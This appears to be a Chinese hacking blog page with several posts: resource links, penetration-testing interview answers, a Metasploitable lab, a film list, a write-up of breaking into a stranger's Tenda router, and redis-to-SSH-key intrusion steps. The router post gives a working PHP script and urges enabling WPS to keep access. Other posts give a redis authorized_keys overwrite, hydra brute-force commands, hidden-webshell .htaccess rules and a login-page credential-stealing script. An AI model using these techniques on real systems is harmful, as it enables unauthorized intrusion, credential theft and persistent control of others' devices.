《DO NOT FUCK WITH A HACKER》

https://github.com/citypw/DNFWAH


各类CTF资源

近年ctf writeup大全

https://github.com/ctfs/write-ups-2016

https://github.com/ctfs/write-ups-2015

https://github.com/ctfs/write-ups-2014


fbctf竞赛平台Demo

https://github.com/facebook/fbctf


ctf Resources

https://github.com/ctfs/resources


各类编程资源:

大礼包(什么都有)

https://github.com/bayandin/awesome-awesomeness


bash-handbook

https://github.com/denysdovhan/bash-handbook


python资源大全

https://github.com/jobbole/awesome-python-cn


git学习资料

https://github.com/xirong/my-git


安卓开源代码解析

https://github.com/android-cn/android-open-project-analysis


python框架,库,资源大合集

https://github.com/vinta/awesome-python


JS 正则表达式库(用于简化构造复杂的JS正则表达式)

https://github.com/VerbalExpressions/JSVerbalExpressions


Python:

python 正则表达式库(用于简化构造复杂的python正则表达式)

https://github.com/VerbalExpressions/PythonVerbalExpressions


python任务管理以及命令执行库

https://github.com/pyinvoke/invoke


python exe打包库

https://github.com/pyinstaller/pyinstaller


py3 爬虫框架

https://github.com/orf/cyborg


一个提供底层接口数据包编程和网络协议支持的python库

https://github.com/CoreSecurity/impacket


python requests 库

https://github.com/kennethreitz/requests


python 实用工具合集

https://github.com/mahmoud/boltons


python爬虫系统

https://github.com/binux/pyspider


ctf向 python工具包

https://github.com/P1kachu/v0lt


科学上网:

科学上网工具

https://github.com/XX-net/XX-Net


福利:

微信自动抢红包动态库


https://github.com/east520/AutoGetRedEnv


微信抢红包插件(安卓版)

https://github.com/geeeeeeeeek/WeChatLuckyMoney

神器

https://github.com/yangyangwithgnu/hardseed


Mrxn 发布于 2017-3-26 16:37

一套实用的渗透测试岗位面试题,你会吗?

21.jpg

1.拿到一个待检测的站,你觉得应该先做什么?

  • 收集信息
    whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...

2.mysql的网站注入,5.0以上和5.0以下有什么区别?

  • 5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。

  • 5.0以下是多用户单操作,5.0以上是多用户多操做。

3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?

  • 丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台。

  • 用邮箱做关键词进行丢进搜索引擎。

  • 利用搜索到的关联信息找出其他邮进而得到常用社交账号。

  • 社工找出社交账号,里面或许会找出管理员设置密码的习惯 。

  • 利用已有信息生成专用字典。

  • 观察管理员常逛哪些非大众性网站,拿下它,你会得到更多好东西。

4.判断出网站的CMS对渗透有什么意义?

  • 查找网上已曝光的程序漏洞。

  • 如果开源,还能下载相对应的源码进行代码审计。

5.一个成熟并且相对安全的CMS,渗透时扫目录的意义?

  • 敏感文件、二级目录扫描

  • 站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点

6.常见的网站服务器容器。

  • IIS、Apache、nginx、Lighttpd、Tomcat

7.mysql注入点,用工具对目标站直接写入一句话,需要哪些条件?

  • root权限以及网站的绝对路径。

8.目前已知哪些版本的容器有解析漏洞,具体举例。

  • IIS 6.0
    /xx.asp/xx.jpg "xx.asp"是文件夹名

  • IIS 7.0/7.5
    默认Fast-CGI开启,直接在url中图片地址后面输入/1.php,会把正常图片当成php解析

  • Nginx
    版本小于等于0.8.37,利用方法和IIS 7.0/7.5一样,Fast-CGI关闭情况下也可利用。
    空字节代码 xxx.jpg%00.php

  • Apache
    上传的文件命名为:test.php.x1.x2.x3,Apache是从右往左判断后缀

  • lighttpd
    xx.jpg/xx.php,不全,请小伙伴们在评论处不吝补充,谢谢!

9.如何手工快速判断目标站是windows还是linux服务器?

  • linux大小写敏感,windows大小写不敏感。

10.为何一个mysql数据库的站,只有一个80端口开放?

  • 更改了端口,没有扫描出来。

  • 站库分离。

  • 3306端口不对外开放

11.3389无法连接的几种情况。

  • 没开放3389 端口

  • 端口被修改

  • 防护拦截

  • 处于内网(需进行端口转发)

12.如何突破注入时字符被转义?

  • 宽字符注入

  • hex编码绕过

13.在某后台新闻编辑界面看到编辑器,应该先做什么?

  • 查看编辑器的名称版本,然后搜索公开的漏洞。

14.拿到一个webshell发现网站根目录下有.htaccess文件,我们能做什么?

  • 能做的事情很多,用隐藏网马来举例子:
    插入
    <FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>
    .jpg文件会被解析成.php文件。

  • 具体其他的事情,不好详说,建议大家自己去搜索语句来玩玩。

15.注入漏洞只能查账号密码?

  • 只要权限广,拖库脱到老。

16.安全狗会追踪变量,从而发现出是一句话木马吗?

  • 是根据特征码,所以很好绕过了,只要思路宽,绕狗绕到欢,但这应该不会是一成不变的。

17.access 扫出后缀为asp的数据库文件,访问乱码。如何实现到本地利用。

  • 迅雷下载,直接改后缀为.mdb。

18.提权时选择可读写目录,为何尽量不用带空格的目录?

  • 因为exp执行多半需要空格界定参数

19.某服务器有站点A,B 为何在A的后台添加test用户,访问B的后台。发现也添加上了test用户?

  • 同数据库。

20.注入时可以不使用and 或or 或xor,直接order by 开始注入吗?

  • and/or/xor,前面的1=1、1=2步骤只是为了判断是否为注入点,如果已经确定是注入点那就可以省那步骤去。

21:某个防注入系统,在注入时会提示:

 系统检测到你有非法注入的行为。
 已记录您的ip xx.xx.xx.xx
 时间:2016:01-23
 提交页面:test.asp?id=15
 提交内容:and 1=1

如何利用这个防注入系统拿shell?

  • 在URL里面直接提交一句话,这样网站就把你的一句话也记录进数据库文件了 这个时候可以尝试寻找网站的配置文件 直接上菜刀链接。具体文章参见:http://ytxiao.lofter.com/post/40583a_ab36540。

22.上传大马后访问乱码时,有哪些解决办法?

  • 浏览器中改编码。

23.审查上传点的元素有什么意义?

  • 有些站点的上传文件类型的限制是在前端实现的,这时只要增加上传类型就能突破限制了。

24.目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,你觉得这里怎样利用?

  • 先爆破用户名,再利用被爆破出来的用户名爆破密码。

  • 其实有些站点,在登陆处也会这样提示

  • 所有和数据库有交互的地方都有可能有注入。

25.目标站发现某txt的下载地址为http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?

  • 这就是传说中的下载漏洞!在file=后面尝试输入index.php下载他的首页文件,然后在首页文件里继续查找其他网站的配置文件,可以找出网站的数据库密码和数据库的地址。

26.甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录下存在编辑器和admin目录。请问你的想法是?

  • 直接在网站二级目录/abc/下扫描敏感文件及目录。

27.在有shell的情况下,如何使用xss实现对目标站的长久控制?

  • 后台登录处加一段记录登录账号密码的js,并且判断是否登录成功,如果登录成功,就把账号密码记录到一个生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值并且需要深入控制权限的网络)。

  • 在登录后才可以访问的文件中插入XSS脚本。

28.后台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用户的密码?

  • 审查元素 把密码处的password属性改成text就明文显示了

29.目标站无防护,上传图片可以正常访问,上传脚本格式访问则403.什么原因?

  • 原因很多,有可能web服务器配置把上传目录写死了不执行相应脚本,尝试改后缀名绕过

30.审查元素得知网站所使用的防护软件,你觉得怎样做到的?

  • 在敏感操作被拦截,通过界面信息无法具体判断是什么防护的时候,F12看HTML体部 比如护卫神就可以在名称那看到<hws>内容<hws>

31.在win2003服务器中建立一个 .zhongzi文件夹用意何为?

  • 隐藏文件夹,为了不让管理员发现你传上去的工具。


32、sql注入有以下两个测试选项,选一个并且阐述不选另一个的理由: 


A. demo.jsp?id=2+1       B. demo.jsp?id=2-1 
选B,在 URL 编码中 + 代表空格,可能会造成混淆


33、以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路? 


demo.do?DATA=AjAxNg== 
DATA有可能经过了 base64 编码再传入服务器,所以我们也要对参数进行 base64 编码才能正确完成测试


34、发现 demo.jsp?uid=110 注入点,你有哪几种思路获取 webshell,哪种是优选? 


有写入权限的,构造联合查询语句使用using INTO OUTFILE,可以将查询的输出重定向到系统的文件中,这样去写入 WebShell 
使用 sqlmap –os-shell 原理和上面一种相同,来直接获得一个 Shell,这样效率更高 
通过构造联合查询语句得到网站管理员的账户和密码,然后扫后台登录后台,再在后台通过改包上传等方法上传 Shell


35、CSRF 和 XSS 和 XXE 有什么区别,以及修复方式? 


XSS是跨站脚本攻击,用户提交的数据中可以构造代码来执行,从而实现窃取用户信息等攻击。修复方式:对字符实体进行转义、使用HTTP Only来禁止JavaScript读取Cookie值、输入时校验、浏览器与Web应用端采用相同的字符编码。 


CSRF是跨站请求伪造攻击,XSS是实现CSRF的诸多手段中的一种,是由于没有在关键操作执行时进行是否由用户自愿发起的确认。修复方式:筛选出需要防范CSRF的页面然后嵌入Token、再次输入密码、检验Referer 
XXE是XML外部实体注入攻击,XML中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感文件读取。修复方式:XML解析库在调用时严格禁止对外部实体的解析。


36、CSRF、SSRF和重放攻击有什么区别? 


CSRF是跨站请求伪造攻击,由客户端发起 
SSRF是服务器端请求伪造,由服务器发起 
重放攻击是将截获的数据包进行重放,达到身份认证等目的


37、说出至少三种业务逻辑漏洞,以及修复方式? 


密码找回漏洞中存在密码允许暴力破解、存在通用型找回凭证、可以跳过验证步骤、找回凭证可以拦包获取等方式来通过厂商提供的密码找回功能来得到密码 
身份认证漏洞中最常见的是会话固定攻击和 Cookie 仿冒,只要得到 Session 或 Cookie 即可伪造用户身份 
验证码漏洞中存在验证码允许暴力破解、验证码可以通过 Javascript 或者改包的方法来进行绕过


38、圈出下面会话中可能存在问题的项,并标注可能会存在的问题?


get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world” 
HTTP/1.1Host:*******.com:82User-Agent:Mozilla/ 5.0 Firefox/40Accept:text/css,*/*;q=0.1
Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer:http://*******.com/eciop/orderForCC/
cgtListForCC.htm?zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI-NX01VPUF46W;
status=True
Connection:keep-alive 

39、找一类你最擅长的漏洞,谈下绕过漏洞修复后的方案?

40、你常用的渗透工具有哪些,最常用的是哪个?

41、描述一个你深入研究过的 CVE 或 POC。

42、谈谈你经常关注的安全平台?


Mrxn 发布于 2017-3-5 08:50

Kali渗透测试演练Metasploitable靶机(附详细word文档+乌云_vmware_201606)

Kali渗透测试演练Metasploitable靶机

准备工作:

VM虚拟机(http://www.vmware.com/cn.html

Kalihttps://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

Metasploitable靶机(https://sourceforge.net/projects/metasploitable/

要求Kali和靶机在同一个Lan

在开始工作前都确认一一下是否在同一个Lan段,分别登录Kali和靶机使用ifconfig 命令查看

注意:Metasploitable的默认账号、密码是:msfadmin:msfadminKali的默认是root:toor

1.png
第一阶段:扫描阶段,工具 namp 

命令:隐蔽扫描:nmap -sS 192.168.209.138


端口爆破:FTPSSH

工具:Hydra

备用字典:

爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt ftp://192.168.209.138

爆破ssh

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt 192.168.209.138 ssh

通过23端口telnet登录进系统

图片过多,我就不一一上传了,都在文档里面,主要包括以下的测试列表,初学者可以测试体验:

  • 端口爆破:FTP、SSH等
  • 利用metasploit进行端口渗透等
  • 8180——-Apache Tomcat弱口令等

Kali渗透测试演练Metasploitable靶机.docx 

百度网盘链接: https://pan.baidu.com/s/1o8HcuAA 有什么问题的可以留言或者是邮件

乌云_vmware_201606点击查看原图


Mrxn 发布于 2017-1-28 10:18

骚年们,看看2016年的这几部黑客题材相关的电影

   一、 Zero Days零日

0.jpg


导演: 亚历克斯·吉布尼

  编剧: 亚历克斯·吉布尼

  主演: 乔安妮·塔克 / 马哈茂德·艾哈迈迪内贾德 /乔治·W· 布什 / 希拉里·罗德姆·克林顿 / 阿利森·科恩 / 更多...

  类型: 纪录片

  官方网站: www.zerodaysfilm.com

  制片国家/地区: 美国

  语言: 英语 / 波斯语 / 德语 / 法语

  上映日期: 2016-02-17(柏林电影节) / 2016-06-13(悉尼电影节) / 2016-07-08(美国)

  片长: 116分钟

  又名: 零日网路战(台)


  零日的剧情简介 · · · · · ·


  一个全新型态的网路超级病毒,突然遍布全世界的电脑,一开始无伤大雅不受重视,直到随着时间累积,许多基础建设的系统都一一被攻击掌控,比过往任何一种病毒复杂几十倍,甚至可能全面瘫痪人们的生活。随着深入调查,揭露这个超级病毒Stuxnet,背后竟是美国与伊朗战争行动的阴谋,伊朗核武危机无法以政治手段解决,美国便对伊朗的网路展开攻击。无法回头的网路攻击逐渐失控,人们生活中各式控制系统都备受威胁,包括发电、交通、通讯、ATM、医院都将不堪一击,网路安全问题全球都可能遭到入侵,下一次的世界大战危机似乎也一触即发。


  二、 Mr.Robot 黑客军团

1.jpg


英文全名Mr.Robot,第2季(2016)USA.

  本季看点:《黑客军团》Cristofer将继续饰演邪恶集团的头目Phillip Price,而Corneliussen也将重回机智而富有野心的Joanna Wellick一角。Joey Bada$$将饰演Leon,Elliot的邻居也是他新交到的朋友,他经常找Elliot夸夸其谈,给他提建议并且与他讨论生命的哲学意义。Conroy饰演Derek,进入Joanna生活中的年轻有魅力的男人,他们之间亲密的举止让Derek死心塌地的爱上了这个丹麦美女。

  类型:惊悚/罪案播出:USA Network

  地区:美国主演: 拉米·马雷克

  语言:英语首播日期:2016-07-14

  英文:Mr. Robot Season 2

  别名:骇客军团第2季


三、Snowden 斯诺登

2.jpg



导演: 奥利佛·斯通

  编剧: 基兰·菲茨杰拉德 / 奥利佛·斯通 / 卢克·哈丁 / 安纳托利·库齐利纳

  主演: 约瑟夫·高登-莱维特 / 谢琳·伍德蕾 / 梅丽莎·里奥 / 扎克瑞·昆图 / 汤姆·威尔金森 / 更多...

  类型: 剧情 / 惊悚 / 传记

  官方网站: snowdenfilm.com

  制片国家/地区: 美国 / 德国

  语言: 英语

  上映日期: 2016-09-09(多伦多电影节) / 2016-09-16(美国)

  片长: 134分钟

  又名: 斯诺登风暴(港) / 神鬼骇客:史诺登(台) / 斯诺登档案 / The Snowden Files / Sacha


  斯诺登的剧情简介 · · · · · ·


  奥利佛·斯通(Oliver Stone)最近正在为他的下一部电影物色演员,这一次他把目光瞄向了因揭露美国监听世界丑闻而名声大噪的爱德华·斯诺登(Edward Snowden)。有消息称,约瑟夫·高登·拉维特(Joseph Gordon-Levitt)目前是这位大导演最中意的“斯诺登”扮演人选,不过此事还未板上钉钉。


  这部斯诺登题材的电影主要基于两本书,一本是英国《卫报》(Guardian)记者卢克·哈丁(Luke Harding)今年初刚刚出版的的《斯诺登档案:世界头号通缉犯的内幕故事》(The Snowden Files: The Inside Story of the World’s Most Wanted Man),该书全面记录了爱德华·斯诺登是如何因为其自由主义价值观与美国政府的监听计划发生冲突,而从一名忠诚的共和党人成为美国政府口中的“叛国者”的。


  第二本书则是斯诺登在俄罗斯的律师Anatoly Kucherena所写的《章鱼的时间》(Time Of The Octopus),这本书对斯诺登如何躲藏到俄罗斯、以及申请政治庇护的过程有着详细的叙述。


四、 I.T. 绝对控制

3.jpg



导演: 约翰·摩尔

  编剧: 丹尼尔·凯 / 小威廉·威谢尔

  主演: 皮尔斯·布鲁斯南 / 詹姆斯·弗兰切威勒 / 安娜·弗莱尔 / 斯戴芬妮·斯考特 / 迈克尔·恩奎斯特/ 更多...

  类型: 剧情 / 科幻 / 悬疑 / 犯罪

  制片国家/地区: 美国 / 爱尔兰 / 法国

  语言: 英语

  上映日期: 2016-12-24(中国大陆) / 2016-09(美国)

  片长: 95分钟


  绝对控制的剧情简介 · · · · · ·


  Mike Regan(皮尔斯·布鲁斯南 饰)拥有他想要的一切:美满的家庭,一栋顶级的全智能别墅,而他的公司则将彻底改变航空业。直到他信赖的ITguy因为Regan一家的冷落而失去理智,开始跟踪他的女儿,监视他的生活….往日依赖的全智能家居和汽车系统如今成为最大的安全隐患。随着隐私的全面暴露,Regan一家陷入前所未有的恐慌,一场个人隐私和现代科技的博弈就此展开……


五、 I’m here 我在

4.jpg


12月25日,由安在新媒体出品,中国首部黑客爱情微电影《我在(I’mhere)》在上海正式首映,作为第一部讲述黑客故事的微电影,《我在(I’m here)》的主创邀请了知名黑客、360独角兽团队负责人杨卿,以及无声信息(PKAV)美女PR sasa分别担任电影的男女主角。



今天是2016年最后一天了,你得黑客梦实现没有?没有实现的赶快看看电影过过瘾,明天就是2017年了,接着吹牛逼,接着努力吧!

下载观看:

https://pan.baidu.com/s/1mik9h24  https://pan.baidu.com/s/1nvyep0P

https://pan.baidu.com/s/1slpQwNF  https://pan.baidu.com/s/1kUEiWj9

https://pan.baidu.com/s/1hrZnJU0  https://pan.baidu.com/s/1mhKm4ek 密码:4aek





Mrxn 发布于 2016-12-31 19:04

实测绕过腾达某型号路由器后台登陆认证,获得管理权限

刚好今天住的地方网络出了问题,就打开手机随便搜索了一下附近的wifi,发现有个可以用钥匙链接,毫不犹豫地连接上去,故事就此展开了:

习惯性地在连接上陌生wifi后进一下后台,用浏览器打开网关,来到这个页面:http://192.168.0.1/login.asp点击查看原图

一看,感觉好眼熟啊,这个和之前在乌云看到的那个腾达漏洞很相似啊,为了验证一下,F12后切换到Network选项卡下面,重新请求一遍,发现从首页index.asp 301 跳转到 login.asp ,而且没有cookies,那么是否是真的是那个漏洞呢?利用php的curl写了个简单的脚本:

<?php 
echo "找到路由的备份文件就好了,密码就在里面。腾达的备份文件是RouterCfm.cfg。在工具的地址栏输入:http://192.168.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg,然后点获取当前地址源码。http_passwd就是登陆密码".'<br>';
$headers = array(
    // 'GET /index.asp HTTP/1.1',
    'Host: 192.168.0.1',
    'Cookie: admin:language=cn;',

);
$url='http://192.168.0.1/index.asp';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 120);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
 ?>


运行后的结果如下:

点击查看原图

从图上看,基本上可以判断是成功了得,再ctrl+u :点击查看原图

开始很纳闷,为啥没有宽带账号/密码,初步判断是静态IP或者是动态获取IP,从图中可以看到wifi密码是八个8--88888888 ,把配置文件下载下来后就可以看到后台的登陆密码了:

5.png

http_passwd=后面的就是路由器后台登陆密码,当然,你也可以不下载配置文件,直接在后台修改登录密码,但是这样容易被路由器的所有者发现,不建议这样做,进入路由后,如果有wps功能,请帮他打开,哈哈,这样即使他改了密码,你通过wps还是很可以轻松的拿到密码---拿下路由器。更多的关于拿下路由器后的各种姿势,请看这篇文章:破解了你的路由密码后,我还可以这样做,绝对不是蹭你网这么简单

      这个漏洞在13年的时候就出来了,而且还有很多成品工具可以一键破解,可是这些厂家和我们的人民 没有多少安全意识,特别是在公共场合的wifi,朋友们在使用的时候,一定要注意,别在这些场所进行资金操作,或者是与个人隐私相关的操作,因为,谁也不知道咋某个角落是否有一个骇客正在监听或者嗅探 or 钓鱼呢? OK ,


Mrxn 发布于 2016-4-28 16:36

通过redis入侵服务器的步骤

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

一,生成本地ssh公钥


ssh-keygen

二,先连接redis看看



telnet 192.168.15.10 6379
redis-cli -h 192.168.15.10

三, 清一下redis数据库


redis-cli -h 192.168.15.10 flushall

四, 向redis写自己的公钥


catkey.txt |redis-cli -h 192.168.15.10 -xsetredis

五, 利用redis写入到文件中












#连接redis
#redis-cli -h 192.168.15.10
#查看keys
192.168.15.10>keys *
#写入配置库的路径及存放位置
192.168.15.10>CONFIG SETdir/root/.ssh/
#写入配置库名称及存放的名字
192.168.15.10>CONFIG SET dbfilename"authorized_keys"
#写入
192.168.15.10>save
#退出
192.168.15.10>exit

六, 远程连接

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件的位置,以及redis可以默认的可以随意访问性的。当然有许多可以猜。

这个是最近redis爆出来的。


Mrxn 发布于 2016-4-18 18:40

搜索

日历

标签